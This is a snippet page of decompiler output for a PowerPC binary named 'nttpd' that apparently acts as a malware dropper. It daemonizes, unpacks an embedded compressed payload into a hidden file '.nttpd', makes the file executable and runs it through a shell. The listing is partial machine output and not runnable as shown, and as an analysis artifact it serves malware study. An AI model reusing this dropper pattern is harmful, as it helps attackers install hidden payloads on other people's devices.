Snippets

Aniol Pagès i Selga nttpd

Created by Aniol Pagès i Selga
nttpd,1-ppc-be-t1-z.c
Raw 
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
//
// This file was generated by the Retargetable Decompiler
// Website: https://retdec.com
// Copyright (c) Retargetable Decompiler <info@retdec.com>
//

#include <fcntl.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

// ------------------------ Structures ------------------------

struct _IO_FILE {
    int32_t e0;
};

struct stat {
    int32_t e0;
    int32_t e1;
    int32_t e2;
    int32_t e3;
    int32_t e4;
    int32_t e5;
    int32_t e6;
    int32_t e7;
    int32_t e8;
    int32_t e9;
    int32_t e10;
    int32_t e11;
    int32_t e12;
    int32_t e13;
    int32_t e14;
    int32_t e15;
    int32_t e16;
    int32_t e17;
    int32_t e18;
    int32_t e19;
};

// ------------------- Function Prototypes --------------------

int32_t function_10000d00(int32_t * a1, int32_t a2, int32_t * a3, uint32_t a4, uint32_t a5, int32_t * a6, int32_t a7, int32_t a8);
int32_t function_10003f18(int32_t * a1, int32_t * a2, int32_t a3, int32_t a4, int32_t a5);
int32_t function_1000a318(int32_t a1);
int32_t function_1000a350(void);
int32_t function_1000a49c(char * command);
int32_t function_1000a6dc(int32_t a1);
int32_t function_1000a988(char * a1, int32_t * a2);

// --------------------- Global Variables ---------------------

int32_t g1 = 0x7801b57d; // 0x1001b770
int32_t g2 = 0; // 0x1001fdf8

// ------------------------ Functions -------------------------

// Address range: 0x10000d00 - 0x10003ca8
int32_t function_10000d00(int32_t * a1, int32_t a2, int32_t * a3, uint32_t a4, uint32_t a5, int32_t * a6, int32_t a7, int32_t a8) {
    int32_t v1 = (int32_t)a6;
    int32_t v2 = -1; // 0x10000d7c
    if (__asm_rlwinm(a7, 0, 29, 29) == 0) {
        // 0x10000d80
        v2 = -1 - a4 + a5 + v1;
    }
    int32_t v3 = v2;
    if (a5 < a4 || (v3 + 1 & v3) != 0) {
        // 0x10000dd4
        *a6 = 0;
        *a3 = v1;
        // 0x10000e50
        return -3;
    }
    int32_t result = (int32_t)a1; // 0x10000e4c
    if (a1 > (int32_t *)53) {
        // 0x100038d8
        *a3 = 0;
        *a6 = 0;
        result = -1;
    }
    // 0x10000e50
    return result;
}

// Address range: 0x10003f18 - 0x100040c8
int32_t function_10003f18(int32_t * a1, int32_t * a2, int32_t a3, int32_t a4, int32_t a5) {
    int32_t * mem = malloc(0x8000); // 0x10003f50
    if (mem == NULL) {
        // 0x100040ac
        return -1;
    }
    int32_t v1 = (int32_t)mem; // 0x10003f50
    int32_t v2 = 0; // bp-11044, 0x10003f84
    int32_t v3; // bp-48, 0x10003f18
    int32_t v4 = &v3;
    int32_t v5 = 0; // 0x10003f84
    int32_t v6 = 0;
    int32_t v7 = (int32_t)a2 - v5; // bp-52, 0x10003f98
    v3 = 0x8000 - v6;
    int32_t v8 = v5 + (int32_t)a1; // 0x10003fb8
    int32_t v9 = __asm_rlwinm(a5, 0, 31, 28); // 0x10003fcc
    int32_t v10 = function_10000d00(&v2, v8, &v7, v1, v6 + v1, &v3, v9, v4); // 0x10003ff4
    v5 += v7;
    int32_t v11 = v3; // 0x1000400c
    int32_t v12 = v8; // 0x10004014
    int32_t result; // 0x10003f18
    if (v11 != 0) {
        // 0x10004018
        v12 = v11;
        result = 0;
        if (v1 == -v6) {
            goto lab_0x10004094;
        }
    }
    while (v10 == 2) {
        // 0x1000407c
        v6 = (v11 + v6) % 0x8000;
        v7 = v12 - v5;
        v3 = 0x8000 - v6;
        v8 = v5 + (int32_t)a1;
        v9 = __asm_rlwinm(a5, 0, 31, 28);
        v10 = function_10000d00(&v2, v8, &v7, v1, v6 + v1, &v3, v9, v4);
        v5 += v7;
        v11 = v3;
        v12 = v8;
        if (v11 != 0) {
            // 0x10004018
            v12 = v11;
            result = 0;
            if (v1 == -v6) {
                goto lab_0x10004094;
            }
        }
    }
    // 0x10004060
    result = __asm_rlwinm(__asm_mfcr(), 31, 31, 31) % 256;
  lab_0x10004094:
    // 0x10004094
    free(mem);
    *a2 = v5;
    // 0x100040ac
    return result;
}

// Address range: 0x1000a318 - 0x1000a350
int32_t function_1000a318(int32_t a1) {
    // 0x1000a318
    return fork();
}

// Address range: 0x1000a350 - 0x1000a49c
int32_t function_1000a350(void) {
    // 0x1000a350
    signal(SIGHUP, SIG_IGN);
    signal(SIGSTOP, SIG_IGN);
    uint32_t v1 = function_1000a318((int32_t)signal(SIGPIPE, SIG_IGN)); // 0x1000a398
    if (v1 <= 0xffffffff) {
        // 0x1000a3ac
        exit(-1);
        // UNREACHABLE
    }
    if (v1 != 0) {
        // 0x1000a3c0
        exit(0);
        // UNREACHABLE
    }
    uint32_t v2 = function_1000a318(0); // 0x1000a3c8
    if (v2 <= 0xffffffff) {
        // 0x1000a3dc
        exit(-1);
        // UNREACHABLE
    }
    if (v2 != 0) {
        // 0x1000a3f0
        exit(0);
        // UNREACHABLE
    }
    // 0x1000a3f8
    umask(0);
    if (setsid() <= 0xffffffff) {
        // 0x1000a414
        exit(-1);
        // UNREACHABLE
    }
    uint32_t fd = open("/dev/null", O_RDWR); // 0x1000a430
    if (fd <= 0xffffffff) {
        // 0x1000a444
        exit(-1);
        // UNREACHABLE
    }
    // 0x1000a44c
    dup2(fd, 0);
    dup2(fd, 1);
    int32_t result = dup2(fd, 2); // 0x1000a478
    if (fd >= 3) {
        // 0x1000a47c
        result = close(fd);
    }
    // 0x1000a484
    return result;
}

// Address range: 0x1000a49c - 0x1000a6dc
int32_t function_1000a49c(char * command) {
    // 0x1000a49c
    if (command == NULL || g2 == 0) {
        // 0x1000a6bc
        return -1;
    }
    int32_t system_rc = -1; // bp-28, 0x1000a4dc
    if (g2 == 1) {
        // 0x1000a66c
        system_rc = system(command);
    } else {
        void (*prev_sig_handler)(int32_t) = signal(SIGQUIT, SIG_IGN); // 0x1000a4f8
        void (*prev_sig_handler2)(int32_t) = signal(SIGINT, SIG_IGN); // 0x1000a508
        void (*prev_sig_handler3)(int32_t) = signal(SIGSTOP, SIG_DFL); // 0x1000a518
        int32_t pid = function_1000a318((int32_t)prev_sig_handler3); // 0x1000a520
        if (pid < 0) {
            // 0x1000a644
            signal(SIGQUIT, prev_sig_handler);
            signal(SIGINT, prev_sig_handler2);
            signal(SIGSTOP, prev_sig_handler3);
        } else {
            if (pid == 0) {
                // 0x1000a540
                signal(SIGQUIT, SIG_DFL);
                signal(SIGINT, SIG_DFL);
                signal(SIGSTOP, SIG_DFL);
                if (g2 == 3) {
                    // 0x1000a574
                    execl("/bin/bash", "bash");
                } else {
                    // 0x1000a5a0
                    execl("/bin/ash", "ash");
                }
                // 0x1000a5cc
                _exit(127);
                // UNREACHABLE
            }
            // 0x1000a5d4
            signal(SIGQUIT, SIG_IGN);
            signal(SIGINT, SIG_IGN);
            if (wait4(pid, (int32_t)&system_rc, 0, NULL) == -1) {
                // 0x1000a614
                system_rc = -1;
            }
            // 0x1000a61c
            signal(SIGQUIT, prev_sig_handler);
            signal(SIGINT, prev_sig_handler2);
            signal(SIGSTOP, prev_sig_handler3);
        }
    }
    uint32_t v1 = system_rc; // 0x1000a67c
    int32_t result = -1; // 0x1000a688
    if (v1 != -1 == v1 % 128 == 0) {
        // 0x1000a6a4
        result = __asm_rlwinm(v1, 0, 16, 23) / 256;
    }
    // 0x1000a6bc
    return result;
}

// Address range: 0x1000a6dc - 0x1000a7c0
int32_t function_1000a6dc(int32_t a1) {
    // 0x1000a6dc
    g2 = 0;
    int32_t v1; // bp-104, 0x1000a6dc
    if (function_1000a988("/bin/bash", &v1) == 0) {
        // 0x1000a71c
        g2 = 3;
        // 0x1000a788
        return __asm_rlwinm(__asm_mfcr(), 31, 31, 31) % 256 ^ 1;
    }
    // 0x1000a72c
    if (function_1000a988("/bin/ash", &v1) == 0) {
        // 0x1000a74c
        g2 = 2;
        // 0x1000a788
        return __asm_rlwinm(__asm_mfcr(), 31, 31, 31) % 256 ^ 1;
    }
    // 0x1000a75c
    if (function_1000a988("/bin/sh", &v1) == 0) {
        // 0x1000a77c
        g2 = 1;
    }
    // 0x1000a788
    return __asm_rlwinm(__asm_mfcr(), 31, 31, 31) % 256 ^ 1;
}

// Address range: 0x1000a7c0 - 0x1000a8cc
int main(int argc, char ** argv) {
    int32_t v1 = function_1000a350(); // 0x1000a7dc
    if (function_1000a6dc(v1) % 256 != 1) {
        // 0x1000a8b0
        return -1;
    }
    // 0x1000a800
    unlink(".nttpd");
    struct _IO_FILE * file = fopen(".nttpd", "w"); // 0x1000a81c
    if (file == NULL) {
        // 0x1000a8b0
        return -1;
    }
    int32_t v2 = 0x44e6; // bp-16, 0x1000a834
    function_10003f18(&g1, &v2, 0x1000a200, (int32_t)file, 1);
    int32_t v3 = __asm_rlwinm(__asm_mfcr(), 31, 31, 31); // 0x1000a868
    fclose(file);
    int32_t result = -1; // 0x1000a884
    if ((char)v3 == 0) {
        // 0x1000a890
        chmod(".nttpd", 448);
        function_1000a49c("./.nttpd");
        result = 0;
    }
    // 0x1000a8b0
    return result;
}

// Address range: 0x1000a988 - 0x1000a99c
int32_t function_1000a988(char * a1, int32_t * a2) {
    // 0x1000a988
    return __xstat(3, a1, (struct stat *)a2);
}

// --------------- Dynamically Linked Functions ---------------

// int __xstat(int ver, const char * filename, struct stat * stat_buf);
// void _exit(int status);
// int chmod(const char * file, __mode_t mode);
// int close(int fd);
// int dup2(int fd, int fd2);
// int execl(const char * path, const char * arg, ...);
// void exit(int status);
// int fclose(FILE * stream);
// FILE * fopen(const char * restrict filename, const char * restrict modes);
// __pid_t fork(void);
// void free(void * ptr);
// void * malloc(size_t size);
// int open(const char * file, int oflag, ...);
// __pid_t setsid(void);
// __sighandler_t signal(int sig, __sighandler_t handler);
// int system(const char * command);
// __mode_t umask(__mode_t mask);
// int unlink(const char * name);
// __pid_t wait4(__pid_t pid, __WAIT_STATUS stat_loc, int options, struct rusage * usage);

// --------------------- Meta-Information ---------------------

// Detected compiler/packer: gcc (4.8.3)
// Detected functions: 8

Comments (0)

HTTPS SSH

You can clone a snippet to your computer for local editing. Learn more.